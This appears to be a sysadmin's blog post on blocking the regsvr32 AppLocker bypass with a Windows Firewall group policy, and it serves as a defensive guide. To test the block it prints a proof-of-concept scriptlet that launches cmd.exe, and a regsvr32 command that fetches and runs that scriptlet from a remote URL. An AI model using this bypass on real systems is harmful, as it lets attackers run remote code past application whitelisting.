A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions). To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall. Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.
Create a GPO and Edit
In Group Policy Management, I created a new GPO and named it Firewall: Block regsvr32 then I edited it.
Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security
Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.
Inbound Rule Wizard
Outbound Rule Wizard
Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.
Link GPO
Now that the GPO is created, you can link the policy within your domain as usual.
Testing
To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.
I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).
backdoor.sct
<?XML version=1.0?>
<scriptlet>
<registration
progid=Empire
classid={F0001111-0000-0000-0000-0000FEEDACDC} >
<!-- Proof Of Concept - Casey Smith @subTee -->
<script language=JScript>
<![CDATA[
var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);
]]>
</script>
</registration>
</scriptlet>
Command to run:
regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll
If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).
